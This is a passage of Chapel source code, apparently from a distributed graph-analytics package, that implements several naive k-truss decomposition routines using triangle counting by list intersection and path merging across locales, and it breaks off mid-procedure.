smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSmall
// For undirected graph, using naive method. Its performance should be worse, but it is a simple implementation to
// check the correctness of the results
proc kTrussNaiveListIntersectionSmallSeq(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}// end of proc exatEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var sVadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var du=nei[u]+neiR[u];
var dv=nei[v]+neiR[v];
var sV:int;
var lV:int;
var ldV:int;
if ( du<=dv ) {
sV=u; //sV is the small degree vertex
lV=v; //lV is the large degree vertex
ldV=dv; //ldV is the degree number
} else {
sV=v;
lV=u;
ldV=du;
}
// here we search from the vertex who has small degree
{
var beginTmp=start_i[sV];
var endTmp=beginTmp+nei[sV]-1;
if ((EdgeDeleted[i]==-1) && (sV!=lV) ){
if ( (nei[sV]>0) ){
for x in dst[beginTmp..endTmp] {
var e=exactEdge(sV,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
beginTmp=start_iR[sV];
endTmp=beginTmp+neiR[sV]-1;
if ((neiR[sV]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=exactEdge(x,sV);
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=lV)) {
sVadj.add(x);
}
}
}
}
if (! sVadj.isEmpty() ){
var Count=0:int;
for s in sVadj {
var ds1=nei[s]+neiR[s];
var e:int;
if (ds1<ldV) {
e=findEdge(s,lV);
} else {
e=findEdge(lV,s);
}
if ( (e!=-1) && (e!=i) ) {
if ( EdgeDeleted[e]==-1) {
Count +=1;
}
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if EdgeDeleted[i]==-1
}// end of triangle counting
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Small Seq,Given k="+k:string+" All removed="+AllRemoved:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Small Seq,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSmallSeq
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaiveListIntersectionSeq(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
//ConFlag=false;
// first we calculate the number of triangles
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>0) ){
for x in dst[beginTmp..endTmp] {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
for x in dst[beginTmp..endTmp] {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
for x in dstR[beginTmp..endTmp] {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
for s in uadj {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive List Intersection Seq,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive List Intersection Seq,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaiveListIntersectionSeq
// For undirected graph, using Naive and list intersection method. It should have worst performance.
// This procedure is just used for worst case test
proc kTrussNaivePathMerge(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N1=0:int;
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the first naive version
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
if (v1==v2) {
//writeln("My locale=",here.id," Find self-loop ",i,"=<",src[i],",",dst[i],">");
}
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
//we will try to remove all the unnecessary edges in the graph
while (ConFlag) {
// first we calculate the number of triangles
coforall loc in Locales {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge {
TriCount[i]=0;
var u = src[i];
var v = dst[i];
var beginUf=start_i[u];
var endUf=beginUf+nei[u]-1;
var beginUb=start_iR[u];
var endUb=beginUb+neiR[u]-1;
var beginVf=start_i[v];
var endVf=beginVf+nei[v]-1;
var beginVb=start_iR[v];
var endVb=beginVb+neiR[v]-1;
var iu:int;
var jv:int;
var eu:int;
var ev:int;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
iu=beginUf;
jv=beginVf;
//writeln("Enter while 1 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVf)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dst[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUf;
jv=beginVb;
//writeln("Enter while 2 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUf) && (jv<=endVb)) {
if ( (EdgeDeleted[iu] !=-1) || (dst[iu]==v) ) {
iu+=1;
continue;
}
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dst[iu]!=v) && ( EdgeDeleted[iu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dst[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dst[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVf;
//writeln("Enter while 3 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVf)) {
eu=findEdge(dstR[iu],u);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[jv]!=-1) || (dst[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dst[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[jv]==-1) ) {
{
if dstR[iu]==dst[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dst[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
iu=beginUb;
jv=beginVb;
//writeln("Enter while 4 in iteration ",N2 , " and edge=", i);
while ( (iu <=endUb) && (jv<=endVb)) {
eu=findEdge(dstR[iu],u);
ev=findEdge(dstR[jv],v);
if ( (EdgeDeleted[eu] !=-1) || (dstR[iu]==v) ) {
iu+=1;
continue;
}
if ( (EdgeDeleted[ev]!=-1) || (dstR[jv]==u) ) {
jv+=1;
continue;
}
//if ( (dstR[jv]!=u) && (dstR[iu]!=v) && ( EdgeDeleted[eu] ==-1) && (EdgeDeleted[ev]==-1) ) {
{
if dstR[iu]==dstR[jv] {
TriCount[i]+=1;
iu+=1;
jv+=1;
} else {
if dstR[iu]<dstR[jv] {
iu+=1;
} else {
jv+=1;
}
}
}
}
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = k-1;
SetCurF.add(i);
//writeln("Remove edge ",i, " in iteration ", N2);
}
}
}// end of on loc
} // end of coforall loc in Locales
if ( SetCurF.getSize()<=0){
ConFlag=false;
}
SetCurF.clear();
N2+=1;
}// end while
timer.stop();
AllRemoved=true;
var tmpi=0;
for i in 0..Ne-1 {
if (EdgeDeleted[i]==-1) {
AllRemoved=false;
} else {
tmpi+=1;
}
}
outMsg="After KTruss Naive Path Merge,Given k="+k:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Total execution time="+(timer.elapsed()):string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Total number of iterations ="+N2:string;
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
outMsg="After KTruss Naive Path Merge,Totally remove "+tmpi:string+ " Edges";
smLogger.debug(getModuleName(),getRoutineName(),getLineNumber(),outMsg);
var countName = st.nextName();
var countEntry = new shared SymEntry(EdgeDeleted);
st.addEntry(countName, countEntry);
var cntMsg = 'created ' + st.attrib(countName);
return cntMsg;
} // end of proc KTrussNaivePathMerge
//For undirected graph, we use list intersection to calculate the number of triangles.
//But affected edge search is normal.
//This procedure is used to show how list intersection can affect the performance compared with our edges search method.
proc kTrussNaiveMinSearch(k:int,nei:[?D1] int, start_i:[?D2] int,src:[?D3] int, dst:[?D4] int,
neiR:[?D11] int, start_iR:[?D12] int,srcR:[?D13] int, dstR:[?D14] int,TriCount:[?D5] int):string throws{
var SetCurF= new DistBag(int,Locales);//use bag to keep the current frontier
var SetNextF= new DistBag((int,int),Locales); //use bag to keep the next frontier
var N2=0:int;
var ConFlag=true:bool;
EdgeDeleted=-1;
var RemovedEdge=0: int;
var timer:Timer;
//To have unique results, we remove the duplicated edges.
proc RemoveDuplicatedEdges( cur: int):int {
//if ( (cur<D3.low) || (cur >D3.high) || (cur==0) ) {
if ( (cur==0) ) {
return -1;
}
var u=src[cur]:int;
var v=dst[cur]:int;
var lu=start_i[u]:int;
var nu=nei[u]:int;
var lv=start_i[v]:int;
var nv=nei[v]:int;
var DupE:int;
if ((nu<=1) || (cur<=lu)) {
DupE=-1;
} else {
DupE =binSearchE(dst,lu,cur-1,v);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
} else {
if (u>v) {
if (nv<=0) {
DupE=-1;
} else {
DupE=binSearchE(dst,lv,lv+nv-1,u);
}
if (DupE!=-1) {
EdgeDeleted[cur]=k-1;
}
}
}
return DupE;
}
// given vertces u and v, return the edge ID e=<u,v>
proc exactEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
return eid;
}
// given vertces u and v, return the edge ID e=<u,v> or e=<v,u>
proc findEdge(u:int,v:int):int {
//given the destinontion arry ary, the edge range [l,h], return the edge ID e where ary[e]=key
if ((u==v) || (u<D1.low) || (v<D1.low) || (u>D1.high) || (v>D1.high) ) {
return -1;
// we do not accept self-loop
}
var beginE=start_i[u];
var eid=-1:int;
if (nei[u]>0) {
if ( (beginE>=0) && (v>=dst[beginE]) && (v<=dst[beginE+nei[u]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[u]-1,v);
// search <u,v> in undirect edges
}
}
if (eid==-1) {// if b
beginE=start_i[v];
if (nei[v]>0) {
if ( (beginE>=0) && (u>=dst[beginE]) && (u<=dst[beginE+nei[v]-1]) ) {
eid=binSearchE(dst,beginE,beginE+nei[v]-1,u);
// search <v,u> in undirect edges
}
}
}// end of if b
return eid;
}// end of proc findEdge(u:int,v:int)
//here we begin the timer
// we first removed the duplicated and cycle edges.
//coforall loc in Locales {
// on loc {
{
{
//var ld = src.localSubdomain();
//var startEdge = ld.low;
//var endEdge = ld.high;
var startEdge = 0;
var endEdge = Ne-1;
forall i in startEdge..endEdge {
var v1=src[i];
var v2=dst[i];
if ( (nei[v1]+neiR[v1])<k-1 ||
((nei[v2]+neiR[v2])<k-1) || (v1==v2)) {
//we will delete all the edges connected with a vertex only has very small degree
//(less than k-1)
EdgeDeleted[i]=k-1;
//writeln("For k=",k," We have removed the edge ",i, "=<",v1,",",v2,">");
//writeln("Degree of ",v1,"=",nei[v1]+neiR[v1]," Degree of ",v2, "=",nei[v2]+neiR[v2]);
// we can safely delete the edge <u,v> if the degree of u or v is less than k-1
// we also remove the self-loop like <v,v>
}
if (EdgeDeleted[i]==-1) {
var DupE= RemoveDuplicatedEdges(i);
if (DupE!=-1) {
//we find duplicated edge
}
}
}
}
}// end of coforall loc
//After Preprocessing
timer.start();
{
// first we calculate the number of triangles using list intersection method.
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
TriCount[i]=0;
var uadj = new set(int, parSafe = true);
var vadj = new set(int, parSafe = true);
var u = src[i];
var v = dst[i];
var beginTmp=start_i[u];
var endTmp=beginTmp+nei[u]-1;
if ((EdgeDeleted[i]==-1) && (u!=v) ){
if ( (nei[u]>1) ){
forall x in dst[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(u,x);//here we find the edge ID to check if it has been removed
if (e!=-1){
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_iR[u];
endTmp=beginTmp+neiR[u]-1;
if ((neiR[u]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref uadj) {
var e=findEdge(x,u);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=v)) {
uadj.add(x);
}
}
}
}
beginTmp=start_i[v];
endTmp=beginTmp+nei[v]-1;
if ( (nei[v]>0) ){
forall x in dst[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(v,x);//here we find the edge ID to check if it has been removed
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
beginTmp=start_iR[v];
endTmp=beginTmp+neiR[v]-1;
if ((neiR[v]>0) ){
forall x in dstR[beginTmp..endTmp] with (ref vadj) {
var e=findEdge(x,v);
if (e==-1){
//writeln("vertex ",x," and ",u," findEdge Error self-loop or no such edge");
} else {
if ((EdgeDeleted[e] ==-1) && (x !=u)) {
vadj.add(x);
}
}
}
}
if (! uadj.isEmpty() ){
var Count=0:int;
forall s in uadj with ( + reduce Count) {
//var e=findEdge(s,v);
if ( vadj.contains(s) ) {
// I found that the contains operation is very expensive in Chapel, we should avoid it.
// This is the reason why list intersection has bad performance
Count +=1;
}
}
TriCount[i] = Count;
// here we get the number of triangles of edge ID i
}// end of if
}//end of if
}// end of forall. We get the number of triangles for each edge
}// end of on loc
} // end of coforall loc in Locales
coforall loc in Locales with (ref SetCurF ) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
// each locale only handles the edges owned by itself
forall i in startEdge..endEdge with(ref SetCurF){
if ((EdgeDeleted[i]==-1) && (TriCount[i] < k-2)) {
EdgeDeleted[i] = 1-k;
SetCurF.add(i);
}
}
}// end of on loc
} // end of coforall loc in Locales
ConFlag=false;
// we remove as many edges as possible in the following code in once iteration
var tmpN2=0:int;
while (SetCurF.getSize()>0) {
//first we build the edge set that will be affected by the removed edges in SetCurF
coforall loc in Locales with ( ref SetNextF) {
on loc {
var ld = src.localSubdomain();
var startEdge = ld.low;
var endEdge = ld.high;
forall i in SetCurF with (ref SetNextF) {
if (xlocal(i,startEdge,endEdge)) {//each local only check the owned edges
var v1=src[i];
var v2=dst[i];
var dv1=nei[v1]+neiR[v1];
var dv2=nei[v2]+neiR[v2];
var sv1:int;
var lv2:int;
var sdv1:int;
var ldv2:int;
if (dv1<=dv2) {
sv1=v1;
lv2=v2;
sdv1=dv1;
ldv2=dv2;
} else {
sv1=v2;
lv2=v1;
sdv1=dv2;
ldv2=dv1;
}
{
var nextStart=start_i[sv1];
var nextEnd=start_i[sv1]+nei[sv1]-1;
if (nei[sv1]>0) {
forall j in nextStart..nextEnd with (ref SetNextF){
var v3=src[j];//v3==sv1
var v4=dst[j];
var tmpe:int;
if ( (EdgeDeleted[j]<=-1) && ( lv2!=v4 ) ) {
var dv4=nei[v4]+neiR[v4];
if (ldv2<dv4) {
tmpe=findEdge(lv2,v4);
} else {
